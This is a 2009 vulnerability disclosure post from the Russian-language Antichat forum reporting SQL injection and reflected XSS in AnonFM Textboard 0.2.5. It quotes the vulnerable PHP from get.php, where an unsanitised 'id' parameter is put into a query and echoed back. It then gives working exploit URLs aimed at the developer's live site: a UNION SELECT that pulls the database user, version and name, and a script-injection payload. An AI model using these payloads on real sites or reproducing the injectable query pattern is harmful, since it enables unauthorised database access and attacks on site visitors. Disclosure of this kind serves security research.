ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
Перезагрузить страницу AnonFM Textboard
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

AnonFM Textboard
  #1  
Старый 16.09.2009, 07:47
Аватар для Ded MustD!e
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
По умолчанию AnonFM Textboard
Уязвимость: SQL-Inj & pXSS
Продукт: AnonFM Textboard
Версия: 0.2.5
Уязвимый файл get.php
Код:
PHP код:
...
$postid1 $_GET['id'];
...
$postquery mysql_query("SELECT message,number,postid FROM threads WHERE postid=$postid1");
$queryresult mysql_fetch_array($postquery);

if ($queryresult == '') { }
else {
  $postid $queryresult['postid'];
  echo "    <td class=\"tdb1\" id=\"a" $queryresult['number'] . "\">" $queryresult['message'] . "</td>\n";
  echo "    <td class=\"tdb12\"><a class=\"green\">#" $queryresult['number'] . "</a> (<a class=\"ilnk\" href=\"mod.php?post=0&id=$postid&postid=$postid\">Mod</a>)<br />ID: $postid1</td>";

Пример на сайте разработчика:
SQL:
Код:
http://www.avuc.nl/c/get.php?id=-1+union+select+concat_ws(0x3a,user(),version(),database()),2,3--+
XSS:
Код:
http://www.avuc.nl/c/get.php?id=1252679693%22%3E%3Cscript%3Ealert()%3C/script%3E
Пассивки там вообще везде...
__________________
Feci, quod potui. Faciant meliora potentes.
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ